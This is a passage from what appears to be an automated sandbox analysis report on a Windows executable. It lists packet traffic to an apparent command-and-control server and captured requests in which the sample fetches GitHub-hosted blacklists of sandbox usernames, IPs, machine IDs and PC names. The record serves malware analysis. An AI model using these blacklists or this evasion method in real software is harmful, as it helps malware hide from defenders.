                                                                                Dec 18, 2024 12:08:03.203691006 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:03.203922987 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:03.325803995 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:03.621479988 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:03.663821936 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:03.813791990 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:03.815551996 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:03.936805964 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:03.936935902 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:04.056699038 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:16.351872921 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:16.471669912 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:16.471786976 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:16.591545105 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:16.893412113 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:16.945111036 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:17.084558010 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:17.086862087 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:17.206548929 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:17.206696987 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:17.326297045 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:25.906343937 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:25.960820913 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:26.097368002 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:26.148312092 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:29.633277893 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:29.752909899 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:29.753113985 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:29.873243093 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:30.182424068 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:30.226478100 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:30.375303030 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:30.376857042 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:30.496421099 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:30.496517897 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:30.616879940 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:42.923331976 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:43.043646097 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:43.043812037 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:43.163748026 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:43.481240988 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:43.523339987 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:43.675857067 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:43.677515030 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:43.797555923 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:43.797617912 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:43.919270039 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:55.912815094 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:55.961724043 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:56.105763912 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:56.148474932 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:56.196577072 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:56.321353912 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:56.321800947 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:56.484153986 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:56.769371033 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:56.820251942 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:56.961245060 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:56.963002920 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:57.083451986 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:08:57.083870888 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:08:57.204525948 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:09.477078915 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:09.599991083 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:09.600063086 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:09.719521046 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:10.022989035 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:10.070290089 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:10.214107037 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:10.215542078 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:10.336384058 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:10.336489916 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:10.456326962 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:22.758306980 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:22.878806114 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:22.878942013 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:22.998502016 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:23.301453114 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:23.351725101 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:23.490752935 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:23.492521048 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:23.615922928 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:23.615968943 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:23.735486984 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:25.149131060 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:25.273305893 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:25.274774075 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:25.553881884 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:25.838253021 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:25.883225918 CET497398848192.168.2.451.89.44.68
                                                                                Dec 18, 2024 12:09:26.029426098 CET88484973951.89.44.68192.168.2.4
                                                                                Dec 18, 2024 12:09:26.070363045 CET497398848192.168.2.451.89.44.68

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 18, 2024 12:07:20.791562080 CET5399153192.168.2.41.1.1.1
                                                                                Dec 18, 2024 12:07:20.929658890 CET53539911.1.1.1192.168.2.4
                                                                                Dec 18, 2024 12:07:23.146152973 CET5219653192.168.2.41.1.1.1
                                                                                Dec 18, 2024 12:07:23.284399033 CET53521961.1.1.1192.168.2.4
                                                                                Dec 18, 2024 12:07:23.296003103 CET6350453192.168.2.41.1.1.1
                                                                                Dec 18, 2024 12:07:23.435605049 CET53635041.1.1.1192.168.2.4

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Dec 18, 2024 12:07:20.791562080 CET192.168.2.41.1.1.10xb809Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                Dec 18, 2024 12:07:23.146152973 CET192.168.2.41.1.1.10x264fStandard query (0)41.140.13.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                Dec 18, 2024 12:07:23.296003103 CET192.168.2.41.1.1.10x75faStandard query (0)github.comA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Dec 18, 2024 12:07:20.929658890 CET1.1.1.1192.168.2.40xb809No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                Dec 18, 2024 12:07:20.929658890 CET1.1.1.1192.168.2.40xb809No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                Dec 18, 2024 12:07:20.929658890 CET1.1.1.1192.168.2.40xb809No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                Dec 18, 2024 12:07:20.929658890 CET1.1.1.1192.168.2.40xb809No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                Dec 18, 2024 12:07:23.284399033 CET1.1.1.1192.168.2.40x264fName error (3)41.140.13.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                Dec 18, 2024 12:07:23.435605049 CET1.1.1.1192.168.2.40x75faNo error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                Dec 18, 2024 12:07:32.514070034 CET1.1.1.1192.168.2.40x6322No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                Dec 18, 2024 12:07:32.514070034 CET1.1.1.1192.168.2.40x6322No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • raw.githubusercontent.com
                                                                                • github.com

                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.449732185.199.108.1334436768C:\Users\user\Desktop\Lu4421.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-18 11:07:22 UTC128OUTGET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1
                                                                                Host: raw.githubusercontent.com
                                                                                Connection: Keep-Alive
                                                                                2024-12-18 11:07:23 UTC900INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Content-Length: 1275
                                                                                Cache-Control: max-age=300
                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                ETag: "bbf75a064e165fba2b8fcc6595e496788fe27c3185ffa2fa56d3479e12867693"
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Frame-Options: deny
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-GitHub-Request-Id: 86B5:2BDE8A:66285F:7029CD:6762ACE9
                                                                                Accept-Ranges: bytes
                                                                                Date: Wed, 18 Dec 2024 11:07:22 GMT
                                                                                Via: 1.1 varnish
                                                                                X-Served-By: cache-ewr-kewr1740069-EWR
                                                                                X-Cache: MISS
                                                                                X-Cache-Hits: 0
                                                                                X-Timer: S1734520043.803876,VS0,VE56
                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                Access-Control-Allow-Origin: *
                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                X-Fastly-Request-ID: c48d24bf7ccc5b8119806b702cf034d696d4b503
                                                                                Expires: Wed, 18 Dec 2024 11:12:22 GMT
                                                                                Source-Age: 0
                                                                                2024-12-18 11:07:23 UTC1275INData Raw: 30 35 68 30 30 47 69 30 0a 30 35 4b 76 41 55 51 4b 50 51 0a 32 31 7a 4c 75 63 55 6e 66 49 38 35 0a 33 75 32 76 39 6d 38 0a 34 33 42 79 34 0a 34 74 67 69 69 7a 73 4c 69 6d 53 0a 35 73 49 42 4b 0a 35 59 33 79 37 33 0a 67 72 65 70 65 74 65 0a 36 34 46 32 74 4b 49 71 4f 35 0a 36 4f 34 4b 79 48 68 4a 58 42 69 52 0a 37 44 42 67 64 78 75 0a 37 77 6a 6c 47 58 37 50 6a 6c 57 34 0a 38 4c 6e 66 41 61 69 39 51 64 4a 52 0a 38 4e 6c 30 43 6f 6c 4e 51 35 62 71 0a 38 56 69 7a 53 4d 0a 39 79 6a 43 50 73 45 59 49 4d 48 0a 41 62 62 79 0a 61 63 6f 78 0a 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 0a 41 6d 79 0a 61 6e 64 72 65 61 0a 41 70 70 4f 6e 46 6c 79 53 75 70 70 6f 72 74 0a 41 53 50 4e 45 54 0a 61 7a 75 72 65 0a 62 61 72 62 61 72 72 61 79 0a 62 65 6e 6a 61 68 0a 42 72 75 6e
                                                                                Data Ascii: 05h00Gi005KvAUQKPQ21zLucUnfI853u2v9m843By44tgiizsLimS5sIBK5Y3y73grepete64F2tKIqO56O4KyHhJXBiR7DBgdxu7wjlGX7PjlW48LnfAai9QdJR8Nl0ColNQ5bq8VizSM9yjCPsEYIMHAbbyacoxAdministratorAmyandreaAppOnFlySupportASPNETazurebarbarraybenjahBrun


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.449734185.199.108.1334436768C:\Users\user\Desktop\Lu4421.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-18 11:07:22 UTC119OUTGET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1
                                                                                Host: raw.githubusercontent.com
                                                                                Connection: Keep-Alive
                                                                                2024-12-18 11:07:23 UTC900INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Content-Length: 2853
                                                                                Cache-Control: max-age=300
                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                ETag: "a0f0ad87a3cc1741bf24d6d8ec37619ff28dab76edf802ca5ceb0e1349232152"
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Frame-Options: deny
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-GitHub-Request-Id: 9490:3115D4:67D8AC:71DD86:6762ACE9
                                                                                Accept-Ranges: bytes
                                                                                Date: Wed, 18 Dec 2024 11:07:22 GMT
                                                                                Via: 1.1 varnish
                                                                                X-Served-By: cache-ewr-kewr1740028-EWR
                                                                                X-Cache: MISS
                                                                                X-Cache-Hits: 0
                                                                                X-Timer: S1734520043.810007,VS0,VE64
                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                Access-Control-Allow-Origin: *
                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                X-Fastly-Request-ID: 3ad63c5a743244ab848575a239bdce518ac7f36c
                                                                                Expires: Wed, 18 Dec 2024 11:12:22 GMT
                                                                                Source-Age: 0
                                                                                2024-12-18 11:07:23 UTC1378INData Raw: 31 30 2e 32 30 30 2e 31 36 39 2e 32 30 34 0a 31 30 34 2e 31 39 38 2e 31 35 35 2e 31 37 33 0a 31 30 34 2e 32 30 30 2e 31 35 31 2e 33 35 0a 31 30 39 2e 31 34 35 2e 31 37 33 2e 31 36 39 0a 31 30 39 2e 32 32 36 2e 33 37 2e 31 37 32 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 30 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 31 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 32 0a 31 34 30 2e 32 32 38 2e 32 31 2e 33 36 0a 31 34 39 2e 38 38 2e 31 31 31 2e 37 39 0a 31 35 34 2e 36 31 2e 37 31 2e 35 30 0a 31 35 34 2e 36 31 2e 37 31 2e 35 31 0a 31 37 32 2e 31 30 35 2e 38 39 2e 32 30 32 0a 31 37 34 2e 37 2e 33 32 2e 31 39 39 0a 31 37 36 2e 36 33 2e 34 2e 31 37 39 0a 31 37 38 2e 32 33 39 2e 31 36 35 2e 37 30 0a 31 38 31 2e 32 31 34 2e 31 35 33 2e 31 31 0a 31 38 35 2e 32 32 30 2e 31 30 31
                                                                                Data Ascii: 10.200.169.204104.198.155.173104.200.151.35109.145.173.169109.226.37.172109.74.154.90109.74.154.91109.74.154.92140.228.21.36149.88.111.79154.61.71.50154.61.71.51172.105.89.202174.7.32.199176.63.4.179178.239.165.70181.214.153.11185.220.101
                                                                                2024-12-18 11:07:23 UTC1378INData Raw: 30 2e 31 31 38 0a 32 31 33 2e 33 33 2e 31 39 30 2e 31 37 31 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 37 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 33 35 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 36 0a 32 31 33 2e 33 33 2e 31 39 30 2e 36 39 0a 32 31 33 2e 33 33 2e 31 39 30 2e 37 34 0a 32 33 2e 31 32 38 2e 32 34 38 2e 34 36 0a 33 34 2e 31 30 35 2e 30 2e 32 37 0a 33 34 2e 31 30 35 2e 31 38 33 2e 36 38 0a 33 34 2e 31 30 35 2e 37 32 2e 32 34 31 0a 33 34 2e 31 33 38 2e 32 35 35 2e 31 30 34 0a 33 34 2e 31 33 38 2e 39 36 2e 32 33 0a 33 34 2e 31 34 31 2e 31 34 36 2e 31 31 34 0a 33 34 2e 31 34 31 2e 32 34 35 2e 32 35 0a 33 34 2e 31 34 32 2e 37 34
                                                                                Data Ascii: 0.118213.33.190.171213.33.190.22213.33.190.227213.33.190.242213.33.190.35213.33.190.42213.33.190.46213.33.190.69213.33.190.7423.128.248.4634.105.0.2734.105.183.6834.105.72.24134.138.255.10434.138.96.2334.141.146.11434.141.245.2534.142.74
                                                                                2024-12-18 11:07:23 UTC97INData Raw: 35 2e 37 31 2e 36 35 0a 39 35 2e 32 35 2e 37 31 2e 37 30 0a 39 35 2e 32 35 2e 37 31 2e 38 30 0a 39 35 2e 32 35 2e 37 31 2e 38 36 0a 39 35 2e 32 35 2e 37 31 2e 38 37 0a 39 35 2e 32 35 2e 37 31 2e 38 39 0a 39 35 2e 32 35 2e 37 31 2e 39 32 0a 39 35 2e 32 35 2e 38 31 2e 32 34 0a 4e 6f 6e 65 0a
                                                                                Data Ascii: 5.71.6595.25.71.7095.25.71.8095.25.71.8695.25.71.8795.25.71.8995.25.71.9295.25.81.24None


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.449735185.199.108.1334436768C:\Users\user\Desktop\Lu4421.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-18 11:07:22 UTC123OUTGET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1
                                                                                Host: raw.githubusercontent.com
                                                                                Connection: Keep-Alive
                                                                                2024-12-18 11:07:23 UTC900INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Content-Length: 1110
                                                                                Cache-Control: max-age=300
                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                ETag: "1224175461dce581d971884e2b8af67d12f105702cbcc56be1043ccc84319e42"
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Frame-Options: deny
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-GitHub-Request-Id: F2C3:189B9F:632926:6D2A70:6762ACE9
                                                                                Accept-Ranges: bytes
                                                                                Date: Wed, 18 Dec 2024 11:07:22 GMT
                                                                                Via: 1.1 varnish
                                                                                X-Served-By: cache-ewr-kewr1740023-EWR
                                                                                X-Cache: MISS
                                                                                X-Cache-Hits: 0
                                                                                X-Timer: S1734520043.805057,VS0,VE60
                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                Access-Control-Allow-Origin: *
                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                X-Fastly-Request-ID: 4c70cce27ad5eb8eb22b2193c924d1e91bb13cad
                                                                                Expires: Wed, 18 Dec 2024 11:12:22 GMT
                                                                                Source-Age: 0
                                                                                2024-12-18 11:07:23 UTC1110INData Raw: 30 38 31 61 62 33 39 35 2d 35 65 38 35 2d 34 36 33 34 2d 61 63 64 62 2d 32 64 62 64 34 66 35 39 61 37 64 30 0a 30 38 39 65 36 32 31 63 2d 31 34 32 32 2d 34 38 35 36 2d 61 38 62 31 2d 33 66 31 64 62 32 30 38 63 65 39 65 0a 31 30 37 39 37 66 31 64 2d 39 36 31 33 2d 34 38 33 32 2d 62 31 61 33 2d 63 32 32 66 65 33 36 35 62 38 39 64 0a 31 35 39 34 37 38 30 32 2d 63 62 39 63 2d 34 37 38 66 2d 61 66 35 63 2d 33 33 62 31 61 62 62 64 31 62 66 65 0a 31 61 38 35 63 36 36 30 2d 31 66 39 38 2d 34 32 63 61 2d 62 31 63 62 2d 31 39 39 66 36 33 65 31 64 38 30 37 0a 32 62 35 33 36 35 66 31 2d 65 65 62 62 2d 34 31 33 35 2d 62 36 65 31 2d 34 31 33 61 61 62 32 39 39 66 63 62 0a 34 35 30 38 61 66 64 33 2d 35 66 30 35 2d 34 39 31 65 2d 62 34 39 66 2d 62 34 34 30 32 34 39 36 37
                                                                                Data Ascii: 081ab395-5e85-4634-acdb-2dbd4f59a7d0089e621c-1422-4856-a8b1-3f1db208ce9e10797f1d-9613-4832-b1a3-c22fe365b89d15947802-cb9c-478f-af5c-33b1abbd1bfe1a85c660-1f98-42ca-b1cb-199f63e1d8072b5365f1-eebb-4135-b6e1-413aab299fcb4508afd3-5f05-491e-b49f-b44024967


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.449733185.199.108.1334436768C:\Users\user\Desktop\Lu4421.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-18 11:07:22 UTC124OUTGET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1
                                                                                Host: raw.githubusercontent.com
                                                                                Connection: Keep-Alive
                                                                                2024-12-18 11:07:22 UTC899INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Content-Length: 3145
                                                                                Cache-Control: max-age=300
                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                ETag: "72b0005e577398f4eb7596131aa14f87c4f7379acc30e24456d4830af5304467"
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Frame-Options: deny
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-GitHub-Request-Id: A39E:60D60:6AC687:74C85C:6762ACE3
                                                                                Accept-Ranges: bytes
                                                                                Date: Wed, 18 Dec 2024 11:07:22 GMT
                                                                                Via: 1.1 varnish
                                                                                X-Served-By: cache-ewr-kewr1740039-EWR
                                                                                X-Cache: MISS
                                                                                X-Cache-Hits: 0
                                                                                X-Timer: S1734520043.806714,VS0,VE14
                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                Access-Control-Allow-Origin: *
                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                X-Fastly-Request-ID: 77918439d65622e1f8bfb4bb56100a6e9949fc50
                                                                                Expires: Wed, 18 Dec 2024 11:12:22 GMT
                                                                                Source-Age: 0
                                                                                2024-12-18 11:07:22 UTC1378INData Raw: 30 30 39 30 30 42 43 38 33 38 30 32 0a 30 30 39 30 30 42 43 38 33 38 30 33 0a 30 43 43 34 37 41 43 38 33 38 30 33 0a 31 38 43 39 41 43 44 46 2d 37 43 30 30 2d 34 0a 33 43 45 43 45 46 43 38 33 38 30 36 0a 36 43 34 45 37 33 33 46 2d 43 32 44 39 2d 34 0a 41 42 49 47 41 49 0a 41 43 45 50 43 0a 41 49 44 41 4e 50 43 0a 41 4c 45 4e 4d 4f 4f 53 2d 50 43 0a 41 4c 49 4f 4e 45 0a 41 50 50 4f 4e 46 4c 59 2d 56 50 53 0a 41 52 43 48 49 42 41 4c 44 50 43 0a 61 7a 75 72 65 0a 42 33 30 46 30 32 34 32 2d 31 43 36 41 2d 34 0a 42 41 52 4f 53 49 4e 4f 2d 50 43 0a 42 45 43 4b 45 52 2d 50 43 0a 42 45 45 37 33 37 30 43 2d 38 43 30 43 2d 34 0a 43 38 31 46 36 36 43 38 33 38 30 35 0a 43 41 54 57 52 49 47 48 54 0a 43 48 53 48 41 57 0a 43 4f 46 46 45 45 2d 53 48 4f 50 0a 43 4f 4d 50
                                                                                Data Ascii: 00900BC8380200900BC838030CC47AC8380318C9ACDF-7C00-43CECEFC838066C4E733F-C2D9-4ABIGAIACEPCAIDANPCALENMOOS-PCALIONEAPPONFLY-VPSARCHIBALDPCazureB30F0242-1C6A-4BAROSINO-PCBECKER-PCBEE7370C-8C0C-4C81F66C83805CATWRIGHTCHSHAWCOFFEE-SHOPCOMP
                                                                                2024-12-18 11:07:22 UTC1378INData Raw: 46 4f 0a 44 45 53 4b 54 4f 50 2d 4c 54 4d 43 4b 4c 41 0a 44 45 53 4b 54 4f 50 2d 4d 4a 43 36 35 30 30 0a 44 45 53 4b 54 4f 50 2d 4d 57 46 52 56 4b 48 0a 44 45 53 4b 54 4f 50 2d 4e 41 4b 46 46 4d 54 0a 44 45 53 4b 54 4f 50 2d 4e 4b 50 30 49 34 50 0a 44 45 53 4b 54 4f 50 2d 4e 4d 31 5a 50 4c 47 0a 44 45 53 4b 54 4f 50 2d 4e 54 55 37 56 55 4f 0a 44 45 53 4b 54 4f 50 2d 4f 36 46 42 4d 46 37 0a 44 45 53 4b 54 4f 50 2d 4f 37 42 49 33 50 54 0a 44 45 53 4b 54 4f 50 2d 50 41 30 46 4e 56 35 0a 44 45 53 4b 54 4f 50 2d 50 4b 51 4e 44 53 52 0a 44 45 53 4b 54 4f 50 2d 51 4c 4e 32 56 55 46 0a 44 45 53 4b 54 4f 50 2d 51 55 41 59 38 47 53 0a 44 45 53 4b 54 4f 50 2d 52 43 41 33 51 57 58 0a 44 45 53 4b 54 4f 50 2d 52 48 58 44 4b 57 57 0a 44 45 53 4b 54 4f 50 2d 52 50 34 46
                                                                                Data Ascii: FODESKTOP-LTMCKLADESKTOP-MJC6500DESKTOP-MWFRVKHDESKTOP-NAKFFMTDESKTOP-NKP0I4PDESKTOP-NM1ZPLGDESKTOP-NTU7VUODESKTOP-O6FBMF7DESKTOP-O7BI3PTDESKTOP-PA0FNV5DESKTOP-PKQNDSRDESKTOP-QLN2VUFDESKTOP-QUAY8GSDESKTOP-RCA3QWXDESKTOP-RHXDKWWDESKTOP-RP4F
                                                                                2024-12-18 11:07:22 UTC389INData Raw: 45 45 4c 35 33 53 4e 0a 57 49 4e 5a 44 53 2d 31 42 48 52 56 50 51 55 0a 57 49 4e 5a 44 53 2d 32 32 55 52 4a 49 42 56 0a 57 49 4e 5a 44 53 2d 33 46 46 32 49 39 53 4e 0a 57 49 4e 5a 44 53 2d 35 4a 37 35 44 54 48 48 0a 57 49 4e 5a 44 53 2d 36 54 55 49 48 4e 37 52 0a 57 49 4e 5a 44 53 2d 38 4d 41 45 49 38 45 34 0a 57 49 4e 5a 44 53 2d 39 49 4f 37 35 53 56 47 0a 57 49 4e 5a 44 53 2d 41 4d 37 36 48 50 4b 32 0a 57 49 4e 5a 44 53 2d 42 30 33 4c 39 43 45 4f 0a 57 49 4e 5a 44 53 2d 42 4d 53 4d 44 38 4d 45 0a 57 49 4e 5a 44 53 2d 42 55 41 4f 4b 47 47 31 0a 57 49 4e 5a 44 53 2d 4b 37 56 49 4b 34 46 43 0a 57 49 4e 5a 44 53 2d 4d 49 4c 4f 42 4d 33 35 0a 57 49 4e 5a 44 53 2d 50 55 30 55 52 50 56 49 0a 57 49 4e 5a 44 53 2d 51 4e 47 4b 47 4e 35 39 0a 57 49 4e 5a 44 53 2d
                                                                                Data Ascii: EEL53SNWINZDS-1BHRVPQUWINZDS-22URJIBVWINZDS-3FF2I9SNWINZDS-5J75DTHHWINZDS-6TUIHN7RWINZDS-8MAEI8E4WINZDS-9IO75SVGWINZDS-AM76HPK2WINZDS-B03L9CEOWINZDS-BMSMD8MEWINZDS-BUAOKGG1WINZDS-K7VIK4FCWINZDS-MILOBM35WINZDS-PU0URPVIWINZDS-QNGKGN59WINZDS-


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.449731185.199.108.1334436768C:\Users\user\Desktop\Lu4421.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-18 11:07:22 UTC120OUTGET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1
